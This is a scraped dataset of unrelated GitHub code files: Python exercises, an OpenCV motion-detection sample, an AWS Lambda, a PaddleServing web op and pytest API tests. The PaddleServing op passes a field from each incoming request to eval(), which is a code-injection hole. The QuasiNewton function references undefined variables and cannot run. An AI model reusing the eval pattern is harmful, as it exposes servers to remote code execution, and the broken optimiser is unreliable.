YOUR SOFTWARE NEED WE CREATE EXCEPTION\r\n#KNOWN AS USER DEFINE EXCEPTION\r\n# TO CREATE USER DEFINE EXCEPTION WE HAVE TO INHERIT PARENT EXCEPTION CLASS\r\n# NAME AS EXCEPTION\r\n\r\n\r\nclass AgeValidError(Exception):\r\n pass\r\nclass Voiting(AgeValidError):\r\n Bjp=0\r\n Congress=0\r\n AAP=0\r\n nota=0\r\n\r\n\r\n\r\n def __init__(self):\r\n self.name=input(\"Enter your name => \")\r\n self.age=int(input(\"Enter Your Age => \"))\r\n self.aadharno=input(\"Enter your aadhar card no=> \")\r\n\r\n def vote(self):\r\n if self.age <=18:\r\n raise AgeValidError(\"not Eligible for voiting\")\r\n else:\r\n print(\"1 for Bjp\\n2 for Congress\\n3 for AAP\")\r\n ch=int(input(\"enter your choice \"))\r\n if ch==1:\r\n Voiting.Bjp+=1\r\n elif ch==2:\r\n Voiting.Congress+=1\r\n elif ch==3:\r\n Voiting.AAP+=1\r\n else:\r\n Voiting.nota+=1\r\n\r\n\r\n\r\ndef main():\r\n while True:\r\n try:\r\n v=Voiting()\r\n v.vote()\r\n except AgeValidError as ave:\r\n print(ave)\r\n finally :\r\n print(\"wait for result\")\r\n\r\n\r\n ch=input(\"next votter plz......(y/n)=> \")\r\n if ch in ('y','Y'):\r\n continue\r\n else:\r\n break\r\n print(\"*********************RESULT*************************\")\r\n print(\"BJP\\tCONGRESS\\tAAP\\tNOTA\")\r\n print(Voiting.Bjp,'\\t',Voiting.Congress,'\\t\\t',Voiting.AAP,'\\t',Voiting.nota)\r\n \r\n \r\n \r\n \r\n","repo_name":"ATUL786pandey/python-class-demo","sub_path":"voiting user exception.py","file_name":"voiting user exception.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3995670969","text":"import cv2\nimport numpy as np\n\nfrom time import time\nfrom detector import MotionDetector\nfrom packer import pack_images\nfrom numba import jit\n\n\n@jit(nopython=True)\ndef filter_fun(b):\n return ((b[2] - b[0]) * (b[3] - b[1])) > 300\n\n\nif __name__ == \"__main__\":\n\n cap = cv2.VideoCapture('tmp/helmets-v1-55.mp4')\n # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)\n # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)\n\n detector = MotionDetector(bg_history=10,\n bg_skip_frames=1,\n movement_frames_history=2,\n brightness_discard_level=5,\n bg_subs_scale_percent=0.2,\n pixel_compression_ratio=0.1,\n group_boxes=True,\n expansion_step=5)\n\n # group_boxes=True can be used if one wants to get less boxes, which include all overlapping boxes\n\n b_height = 320\n b_width = 320\n\n res = []\n fc = dict()\n ctr = 0\n while True:\n # 
Capture frame-by-frame\n ret, frame = cap.read()\n if frame is None:\n break\n\n begin = time()\n\n boxes, frame = detector.detect(frame)\n # boxes hold all boxes around motion parts\n\n ## this code cuts motion areas from initial image and\n ## fills \"bins\" of 320x320 with such motion areas.\n ##\n results = []\n if boxes:\n results, box_map = pack_images(frame=frame, boxes=boxes, width=b_width, height=b_height,\n box_filter=filter_fun)\n # box_map holds list of mapping between image placement in packed bins and original boxes\n\n ## end\n\n for b in boxes:\n cv2.rectangle(frame, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 1)\n\n end = time()\n it = (end - begin) * 1000\n\n res.append(it)\n print(\"StdDev: %.4f\" % np.std(res), \"Mean: %.4f\" % np.mean(res), \"Last: %.4f\" % it,\n \"Boxes found: \", len(boxes))\n\n if len(res) > 10000:\n res = []\n\n # idx = 0\n # for r in results:\n # idx += 1\n # cv2.imshow('packed_frame_%d' % idx, r)\n\n ctr += 1\n nc = len(results)\n if nc in fc:\n fc[nc] += 1\n else:\n fc[nc] = 0\n\n if ctr % 100 == 0:\n print(\"Total Frames: \", ctr, \"Packed Frames:\", fc)\n\n cv2.imshow('last_frame', frame)\n cv2.imshow('detect_frame', detector.detection_boxed)\n cv2.imshow('diff_frame', detector.color_movement)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n print(fc, ctr)\n","repo_name":"bwsw/rt-motion-detection-opencv-python","sub_path":"example/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"54"} +{"seq_id":"6866363521","text":"import boto3\nimport os\nfrom datetime import datetime, timedelta\n\ndef determine_next_maintenance_window():\n maintenance_window_day = os.environ.get('MaintenanceWindowDay')\n maintenance_window_time = os.environ.get('MaintenanceWindowTime')\n\n # Determine the next maintance window\n hour = datetime.strptime(maintenance_window_time, \"%H:%M\").time()\n weekdays = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n weekday = weekdays.index(maintenance_window_day)\n now = datetime.utcnow()\n days_until_maintance_window = (7 + weekday - now.weekday()) % 7\n if days_until_maintance_window == 0 and now.time() > hour:\n days_until_maintance_window = 7\n \n time_until_maintance_window = timedelta(days=days_until_maintance_window)\n next_maintance_window = now + time_until_maintance_window\n next_maintance_window = next_maintance_window.replace(hour=hour.hour, minute=hour.minute, second=0, microsecond=0)\n maintance_window_utc_timestamp = next_maintance_window.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n return maintance_window_utc_timestamp\n\n\ndef lambda_handler(event, context):\n \n exclude_tag = os.environ['ExcludeTag']\n email_approval = os.environ['EmailApproval']\n architectural_change = os.environ['ArchitecturalChange']\n risk_profile = ['No Risk', 'Very Low', 'Low', 'Medium', 'High', 'Very High'].index(os.environ['RiskProfile'])\n ec2_id = event['InstanceArn'].split('/')[1]\n region = event['InstanceArn'].split(':')[3]\n return_message = {\n \"change_option_detected\": False,\n \"ec2_id\": ec2_id,\n \"InstanceArn\": event['InstanceArn'],\n \"ec2_name\": event['InstanceName'],\n \"message\": \"None of the recommendations met the requirements\"\n }\n \n maintance_window_utc_timestamp = determine_next_maintenance_window()\n\n ec2 = boto3.resource('ec2')\n ec2_instance = ec2.Instance(ec2_id)\n stop_protection = ec2_instance.describe_attribute(Attribute='disableApiStop')\n if 
stop_protection['DisableApiStop']['Value'] == True:\n return_message[\"message\"] = \"The instance was configured with Stop Protection\"\n return return_message\n\n ec2_client = boto3.client('ec2', region_name=region)\n response = ec2_client.describe_instances(InstanceIds=[ec2_id])\n tags = response['Reservations'][0]['Instances'][0]['Tags']\n\n for tag in tags:\n if tag['Key'] == exclude_tag:\n return_message[\"message\"] = \"The instance is excluded from the Compute Optimization automate recommendations (due to the tag)\"\n return return_message\n \n if tag['Key'] == 'aws:autoscaling:groupName':\n return_message[\"message\"] = \"The instance is part of an ASG\"\n return return_message\n \n if response['Reservations'][0]['Instances'][0]['CapacityReservationSpecification']['CapacityReservationPreference'] != 'open':\n return_message[\"message\"] = \"The instance is part of an ODCR\"\n return return_message\n\n if response['Reservations'][0]['Instances'][0]['Placement']['GroupName'] != '':\n return_message[\"message\"] = \"The instance is part of a Placement Group\"\n return return_message\n \n # # Validate that the instance has CloudWatch Agent installed\n # cw_agent_installed = False\n # for utilization_metric in event['UtilizationMetrics']:\n # if utilization_metric['Name'] == 'MEMORY':\n # cw_agent_installed = True\n \n # if not cw_agent_installed:\n # return_message[\"message\"] = 'The instance does not have CloudWatch Agent installed'\n # return return_message\n \n for recommendation in event['RecommendationOptions']:\n if recommendation['PerformanceRisk'] <= risk_profile and 'SavingsOpportunity' in recommendation:\n if recommendation['InstanceType'] == event['CurrentInstanceType']:\n continue\n \n if 'Architecture' in recommendation['PlatformDifferences'] and architectural_change != 'yes':\n continue\n\n if 'Hypervisor' not in recommendation['PlatformDifferences'] and recommendation['SavingsOpportunity'] != None:\n if 'InstanceStoreAvailability' in recommendation['PlatformDifferences']:\n continue\n \n return {\n \"change_option_detected\": True,\n \"email_approval\": email_approval,\n \"maintenance_window\": maintance_window_utc_timestamp,\n \"InstanceArn\": event['InstanceArn'],\n \"ec2_id\": ec2_id,\n \"ec2_name\": event['InstanceName'],\n \"ec2_new_instance_type\": recommendation['InstanceType'],\n \"ec2_current_instance_type\": event['CurrentInstanceType'],\n \"migration_effort\": recommendation['MigrationEffort'],\n \"performance_risk\": recommendation['PerformanceRisk'],\n \"savings_opportunity\": recommendation['SavingsOpportunity']['EstimatedMonthlySavings']['Value'],\n \"savings_opportunity_percentage\": recommendation['SavingsOpportunity']['SavingsOpportunityPercentage']\n }\n \n return return_message","repo_name":"aws-samples/compute-optimizer-automation","sub_path":"src/lambda/validate-instance.py","file_name":"validate-instance.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"40972287099","text":"import math\nfrom time import sleep\n\nclass CoffeeMachine():\n\n def __init__(self,milk: int,water:int ,coffee:int ) -> None:\n \"\"\"Initialize coffee machine with milk, water and coffee amount\"\"\"\n self.milk = milk\n self.water = water\n self.coffee = coffee\n self.profit = 0\n\n print(f\"I prepare espress, capuccino and latte from {self.milk},{self.coffee} and {self.water}\")\n \n def prepare_latte():\n pass\n\n def accept_coins(self,amount):\n user_input = 
float(0)\n inputing_coin = True\n while inputing_coin:\n coin = input(\"Please insert coins: \")\n if coin == \"nickel\":\n user_input = math.fsum([user_input, 0.5])\n elif coin == \"quarter\":\n user_input = math.fsum([user_input,0.25]) \n elif coin == \"dimes\":\n user_input = math.fsum([user_input,0.05])\n elif coin == \"dollar\":\n user_input = math.fsum([user_input,1.0])\n elif coin == \"done\":\n if user_input >= amount:\n self.__return_exchange(user_input-amount)\n return True\n else:\n print(\"Insufficient amount. You don't get coffee!\")\n self.__return_exchange(user_input)\n return False\n def add_profit(self,amount):\n print(f\"Adding profit of {amount}$\")\n self.profit = math.fsum([self.profit,amount])\n\n def prepare_cappucino(self):\n self.milk -= 150\n self.coffee -= 50\n self.water -= 50\n\n for i in range(10):\n print(\"..\",end=\"\",flush=True)\n sleep(1)\n print(\"\\nYour Cappucino is ready, enjoy!\")\n return True\n \n def prepare_latte(self):\n self.milk -= 200\n self.coffee -= 30\n self.water -= 50\n\n for i in range(10):\n print(\"..\",end=\"\",flush=True)\n sleep(1)\n print(\"\\nYour Latte is ready, enjoy!\")\n return True\n \n def prepare_espresso(self):\n self.water -= 50\n self.coffee -= 30\n for i in range(5):\n print(\"..\",end=\"\",flush=True)\n sleep(1)\n print(\"\\nYour espresso is ready, enjoy!\")\n return True\n \n def check_avaiable_materials(self,water=0,milk=0,coffee=0):\n is_available = True\n if self.water < water:\n is_available = False\n print(\"Sorry, not enough water in machine\")\n return is_available\n if self.coffee < coffee:\n is_available = False\n print(\"Sorry, not enough coffee in machine\")\n return is_available\n if self.milk < milk:\n is_available = False\n print(\"Sorry, not enough milk in machine\")\n return is_available\n return is_available\n\n def report(self):\n print(f\"Current situation is:\\nMilk: {self.milk}\\nCoffee: {self.coffee}\\nWater: {self.water}\\nProfit: {self.profit}$\")\n\n @staticmethod\n def __return_exchange(amount):\n if amount == 0.0:\n return\n print(f\"Please take your change of {amount}$\")\n \n def operate(self):\n operating_condition = True\n\n while operating_condition:\n user_choice = input(\"What would you like? 
\")\n if user_choice == \"off-operator\": \n print(\"Coffee Machine going to sleep\")\n operating_condition = False\n\n elif user_choice == \"latte\":\n if self.check_avaiable_materials(water=50,milk=200,coffee=30):\n if self.accept_coins(2.5):\n print(\"preparing latte:\")\n self.prepare_latte()\n self.add_profit(2.5)\n else:\n print(\"Choose something else\")\n elif user_choice == \"cappucino\":\n if self.check_avaiable_materials(water=50,milk=150,coffee=50):\n if self.accept_coins(3.0):\n print(\"Preparing cappucino\")\n self.prepare_cappucino()\n self.add_profit(3.0)\n else :\n print(\"Choose something else\")\n elif user_choice == \"espresso\":\n if self.check_avaiable_materials(water=30,coffee=50):\n if self.accept_coins(1.5):\n print(\"Preparing espresso\")\n self.prepare_espresso()\n self.add_profit(1.5)\n else :\n print(\"Choose something else\")\n elif user_choice == \"report\":\n self.report()\n continue\n else:\n print(\"Non existing option\")\n continue\n\nif __name__ == \"__main__\":\n milk_amount,water_amount,coffee_amount = [int(input(f\"Please insert amount of {material}: \")) for material in [\"milk\",\"water\",\"coffee\"]]\n coffee_machine1 = CoffeeMachine(milk=milk_amount,water=water_amount,coffee=coffee_amount)\n coffee_machine1.operate()","repo_name":"SarhadMirzakhanyan/100days","sub_path":"Day15-CoffeeMachine/coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32712357020","text":"# Next larger\n# Send Feedback\n# Given a generic tree and an integer n. Find and return the node with next larger element in the Tree i.e.\n# find a node with value just greater than n.\n# Return NULL if no node is present with the value greater than n.\n# Input Format :\n# Line 1 : Integer n\n# Line 2 : Elements in level order form separated by space (as per done in class). 
Order is -\n# Root_data, n (No_Of_Child_Of_Root), n children, and so on for every element\n# Output Format :\n# Node with value just greater than n.\n# Sample Input 1 :\n# 18\n# 10 3 20 30 40 2 40 50 0 0 0 0\n# Sample Output 1 :\n# 20\n# Sample Input 2 :\n# 21\n# 10 3 20 30 40 2 40 50 0 0 0 0\n# Sample Output 2:\n# 30\n# Download Test Cases\n\nclass treeNode:\n def __init__(self, data):\n self.data = data\n self.children = []\n\nmax_value_holder = 1000000\nmax_node = 1000000\ndef nextLargest(tree, n):\n global max_value_holder\n global max_node\n if tree is None:\n return\n\n if n < tree.data < max_value_holder:\n max_value_holder = tree.data\n max_node = tree\n for child in tree.children:\n max_node = nextLargest(child, n)\n\n return max_node\n\ndef createLevelWiseTree(arr):\n root = treeNode(int(arr[0]))\n q = [root]\n size = len(arr)\n i = 1\n while i epsilon * abs(dphi_zero):\n alpha_old = alpha_curr\n alpha_curr = alpha\n dphi_old = dphi_curr\n dphi_curr = np.dot(np.array(list(g.subs(list(zip(v, X + (alpha_curr * d))))), dtype=np.float), d)\n alpha = (dphi_curr * alpha_old - dphi_old * alpha_curr) / (dphi_curr - dphi_old)\n i += 1\n if i % 2 == 0:\n print(\"i={}, alpha_curr={}, alpha_old={}, alpha={}\".format(i, alpha_curr, alpha_old, alpha))\n if (i >= max) or (abs(dphi_curr) > epsilon * abs(dphi_zero)):\n return alpha\n\n def bfgs(self, f, x0, d0, g0, Q0, epslon, i, alpha):\n '''\n Broyden-Fletcher-Goldfarb-Shanno\n ..fun as callable object; must be a function of x0 and return a single number\n ..x0 as a numeric array; point from which to start\n '''\n g = Gradient(f, x0)\n if sum(abs(d0)) < epslon or i is not 0:\n Q = [self.params['hessian']['initial'] if self.params['hessian']['initial'] else np.identity(len(x0))][0]\n else:\n q = (g - g0)[np.newaxis].T\n p = (alpha * d0)[np.newaxis].T\n Q = Q0 + (1.0 + q.T.dot(Q0).dot(q) / (q.T.dot(p))) * (p.dot(p.T)) / (p.T.dot(q)) - (\n p.dot(q.T).dot(Q0) + Q0.dot(q).dot(p.T)) / (q.T.dot(p))\n d = -Q.dot(g)\n return d, g, Q\n\ndef QuasiNewton(f, max_iter, x0, epsilon):\n i = 0\n xk = x0\n norm_values = []\n\n a = np.random.random_integers(-20, 20+1, size=(2, 2))\n b = a.T\n hk = (a + b) / 2\n grad_f = Gradient(f)\n\n while i < max_iter:\n norm = np.linalg.norm(np.array(Gradient(f, xk), dtype=np.float))\n if norm < epsilon:\n break\n else:\n B_inv = np.linalg.inv(B[i])\n\n # print(grad)\n p = -np.dot(grad, B_inv)\n # print(p)\n alpha = secant_search(grad_f, x_values[i], p)\n x_values[i + 1] = x_values[i] + alpha * p\n\n del_k = np.array(x_values[i + 1] - x_values[i])\n\n #gamma_k = np.dot(del_k, grad)\n gamma_k = del_k * grad\n\n B[i + 1] = B[i] + np.dot(gamma_k.T, gamma_k) / np.dot(del_k, gamma_k) - \\\n np.dot(np.dot(gamma_k.T, del_k.T), np.dot(del_k, gamma_k))/np.dot(np.dot(del_k, gamma_k), del_k.T)\n\n norm_values.append(norm)\n i += 1\n return (x_values[i-1], norm_values[i-1])\n\n\nif __name__ == '__main__':\n x1, x2, x3 = sp.symbols('x1 x2 x3')\n k, m, n = sp.symbols('k m n', integer=True)\n f, g, h = sp.symbols('f g h', cls=sp.Function)\n sp.init_printing(use_unicode=True)\n #f = 100 * (x2 - x1 ** 2) ** 2 + (1 - x1) ** 2\n f = (x1 - 1) ** 2 + (2 - x2 ** 2) ** 2 + 4 # * (x3 - 3)**4\n v = list(ordered(f.free_symbols))\n\n print(QuasiNewton(f, 10000, [-2, 2], 0.0001))\n","repo_name":"hih84211/Optimization-Algorithms-exercises","sub_path":"p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71970544160","text":"# -*- 
coding: utf-8 -*-\nfrom collections import namedtuple\nimport matplotlib\n#matplotlib.use('Agg')\nimport argparse\nimport ast\nimport matplotlib.pyplot as plt\nimport numpy\n\n\ndef read_cnn_data(file_path):\n time_data = []\n acc_data = []\n ite_data = []\n results_file = open(file_path, 'rb')\n for idx, line in enumerate(results_file):\n if line.startswith(\"#\") or line == None or idx == 0:\n continue\n line = line.replace(' ', '')\n line_data = line.split('\\t')\n \n v_time = float(line_data[0])\n v_acc = float(line_data[1])\n time_data.append(v_time)\n acc_data.append(v_acc)\n ite_data.append(idx)\n results_file.close()\n time_data = numpy.asarray(time_data)\n acc_data = numpy.asarray(acc_data)\n ite_data = numpy.asarray(ite_data)\n return time_data, acc_data, ite_data\n\ndef plot_acc_vs_time(train_time, train_acc, test_time, test_acc, title, filename):\n train_time = train_time/60/60\n test_time = test_time/60/60\n plt.figure()\n plt.plot(train_time, train_acc, color=\"blue\", label='Base Treinamento')\n plt.plot(test_time, test_acc, color=\"red\", label='Base Teste')\n plt.title(title)\n plt.xlabel(u\"Tempo (horas)\")\n plt.ylabel(u\"Acurácia\")\n plt.ylim(0,100)\n plt.legend(loc='best')\n #plt.xlim(0,100)\n #plt.xlim(0.5,4.5)\n #plt.xticks(time_data)\n #plt.show()\n plt.tight_layout()\n plt.savefig(filename)\n\ndef main():\n parser = argparse.ArgumentParser(prog='cnn_visualizer.py', usage='%(prog)s [options]',\n description='Plot data', \n epilog=\"\")\n parser.add_argument('-train', '--train', help='input train file with results', required=True)\n parser.add_argument('-test', '--test', help='input test file with results', required=True)\n args = parser.parse_args()\n\n train_time, train_acc, train_ite = read_cnn_data(args.train)\n test_time, test_acc, test_ite = read_cnn_data(args.test)\n\n plot_acc_vs_time(train_time, train_acc, test_time, test_acc, u\"Tempo vs Acurácia\", 'plot.png')\n #plot_acc_vs_time(train_ite, train_acc, test_ite, test_acc)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"guidefreitas/bag_of_visual_words","sub_path":"tools/cnn_visualizer.py","file_name":"cnn_visualizer.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29354817320","text":"from paddle_serving_server.web_service import WebService, Op\nimport logging\nimport numpy as np\nfrom numpy import array\nimport sys\nimport base64\n\n_LOGGER = logging.getLogger()\nnp.set_printoptions(threshold=sys.maxsize)\n\n\nclass UciOp(Op):\n def init_op(self):\n self.separator = \",\"\n\n def preprocess(self, input_dicts, data_id, log_id):\n \"\"\"\n diff with web_server.py\n\tjavaclient input type is INDArray, restful request input is list.\n\tthis function simply reshape input to the Specified shape.\n \"\"\"\n (_, input_dict), = input_dicts.items()\n _LOGGER.error(\"UciOp::preprocess >>> log_id:{}, input:{}\".format(\n log_id, input_dict))\n proc_dict = {}\n x_value = eval(input_dict[\"x\"])\n input_dict[\"x\"] = x_value.reshape(1, 13)\n\n return input_dict, False, None, \"\"\n\n def postprocess(self, input_dicts, fetch_dict, data_id, log_id):\n _LOGGER.info(\n \"UciOp::postprocess >>> data_id:{}, log_id:{}, fetch_dict:{}\".\n format(data_id, log_id, fetch_dict))\n fetch_dict[\"price\"] = str(fetch_dict[\"price\"][0][0])\n return fetch_dict, None, \"\"\n\n\nclass UciService(WebService):\n def get_pipeline_response(self, read_op):\n uci_op = UciOp(name=\"uci\", input_ops=[read_op])\n return 
uci_op\n\n\nuci_service = UciService(name=\"uci\")\nuci_service.prepare_pipeline_config(\"config.yml\")\nuci_service.run_service()\n","repo_name":"PaddlePaddle/Serving","sub_path":"examples/Pipeline/simple_web_service/web_service_java.py","file_name":"web_service_java.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":848,"dataset":"github-code","pt":"54"} +{"seq_id":"22356898116","text":"a,b,x,y = map(int,input().split())\r\nif a == b:\r\n print(x)\r\n exit()\r\nif a None:\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # check the post by creating a publication\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n )\n assert response.status_code == 201\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_post_and_get_pub(\n ninja_client,\n super_user,\n publication_get_info,\n generate_basic_publications\n):\n # Check if the publication was created successfully and if the gets work\n assert ninja_client.get(\n 'publications/publications/obtener_as_admin/1',\n user=super_user\n ).json() == publication_get_info\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_accept_and_get_pub(\n ninja_client,\n super_user,\n publication_get_info,\n generate_basic_publications\n):\n # Check if the publication was created successfully and if the gets work\n assert ninja_client.get(\n 'publications/publications/obtener_as_admin/1',\n user=super_user\n ).json() == publication_get_info\n accept_publication_get_info = {**publication_get_info}\n accept_publication_get_info['is_active'] = True\n accept_publication_get_info['is_accepted'] = True\n response = ninja_client.patch(\n 'publications/publications/accept/1',\n user=super_user\n )\n assert response.status_code == 200\n assert response.json() == accept_publication_get_info\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_reject_and_get_pub(\n ninja_client,\n super_user,\n publication_get_info,\n generate_basic_publications\n):\n # Check if the publication was created successfully and if the gets work\n assert ninja_client.get(\n 'publications/publications/obtener_as_admin/1',\n user=super_user\n ).json() == publication_get_info\n assert ninja_client.delete(\n 'publications/publications/reject/1',\n user=super_user\n ).status_code == 204\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef show_all_publications(\n ninja_client,\n super_user,\n generate_basic_publications\n):\n # Accept publicatio\n assert ninja_client.get(\n '/publications/publications/all',\n user=super_user\n ).json() == [{\n 'id': 1,\n 'seller': 1,\n 'photo_uris': [_IMAGE_URI],\n 'description': 'Test description',\n 'general_item_info': {\n 'name': 'jockey',\n 'brand': 'adidas',\n 'category': {'id': 1, 'name': 'categorytest'},\n 'total_amount': 3\n }\n }]\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef 
test_category_create_delete(\n ninja_client,\n super_user,\n category_creation_info,\n category_photo_file\n):\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # get all categories\n assert ninja_client.get(\n '/publications/categories/all'\n ).json() == [category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}]\n # delete categories\n assert ninja_client.delete(\n '/publications/categories/remove/1',\n user=super_user\n ).status_code == 204\n # get empty list\n assert ninja_client.get(\n '/publications/categories/all'\n ).json() == []\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_create_invalid_item(\n ninja_client,\n user_one,\n publication_creation_info,\n publication_photo_file,\n generate_basic_publications\n):\n # create invalid publication\n wrong_pub_info = deepcopy(publication_creation_info)\n wrong_pub_info['item_brand'] = 'WrongBrand'\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(wrong_pub_info),\n },\n FILES=publication_photo_file,\n user=user_one\n ).status_code == 409\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_create_publication_with_valid_existing_item(\n ninja_client,\n super_user,\n user_two,\n user_two_creation_info,\n publication_creation_info,\n publication_photo_file,\n publication_get_info,\n generate_basic_publications\n):\n # create second user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_two_creation_info\n )\n # give new user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/2',\n user=super_user\n )\n # create valid publication with existing item\n capitalized_pub_info = deepcopy(publication_creation_info)\n capitalized_pub_info['item_brand'] = 'ADIDAS'\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(capitalized_pub_info),\n },\n FILES=publication_photo_file,\n user=user_two\n )\n assert 'publication_items' in response.json().keys()\n assert response.json()['publication_items'][0]['item'] \\\n == publication_get_info['publication_items'][0]['item']\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_wrong_field_value_publication_post(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n publication_photo_file,\n category_creation_info,\n category_photo_file,\n generate_seller_permissions\n):\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # Give empty publication items list\n empty_publication_creation_info = {**publication_creation_info}\n empty_publication_creation_info['publication_items'] = []\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(empty_publication_creation_info),\n },\n FILES=publication_photo_file,\n 
user=user_one\n ).json() == {'errors': {'publication_items': ['List can not be empty.']}}\n # Give too long of a fied\n size_too_long_creation_info = {**publication_creation_info}\n size_too_long_creation_info['publication_items'][0]['size'] = 'a' * 64\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(size_too_long_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n )\n assert response.status_code == 400\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_duplicate_sku_in_publication_items(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n publication_photo_file,\n category_creation_info,\n category_photo_file,\n generate_seller_permissions\n):\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # Give empty publication items list\n duplicate_sku_creation_info = {**publication_creation_info}\n duplicate_sku_creation_info['publication_items'].append({\n 'size': 'S',\n 'color': 'Red',\n 'amount': 10,\n 'sku': 222\n })\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(duplicate_sku_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n ).json() == {'message': 'Duplicate sku.'}\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_get_all_existing_brands(\n ninja_client,\n generate_basic_publications\n):\n assert ninja_client.get(\n '/publications/publications/existing_brands'\n ).json() == ['adidas']\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef create_duplicate_publication(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n publication_photo_file,\n category_creation_info,\n generate_basic_publications\n):\n # Create post\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=publication_photo_file,\n user=user_one\n )\n expected_error = 'Publication for items with this name and brand' \\\n + 'already exist.'\n assert response.status_code == 400\n assert response.json() == {'message': expected_error}\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef add_publication_items(\n ninja_client,\n user_one,\n publication_get_info,\n generate_basic_publications\n):\n # Add valid publication_item\n new_pub_items = [\n {'size': 'S', 'color': 'White', 'sku': 223, 'amount': 1},\n {'size': 'S', 'color': 'Red', 'sku': 224, 'amount': 1},\n ]\n # Create expected response\n new_publication_items = publication_get_info['publication_items']\n for i, info in enumerate(new_pub_items):\n new_publication_items.append({\n 'id': i + 2,\n 'publication': 1,\n 'item': {\n 'id': i + 2,\n 'name': 'jockey',\n 'brand': 'adidas',\n 'category': {'id': 1, 'name': 'categorytest'},\n 'color': info['color'],\n 'size': info['size'],\n 'sku': info['sku']\n },\n 'available': info['amount']\n })\n # Assert correct response\n add_valid_pub_item_response = 
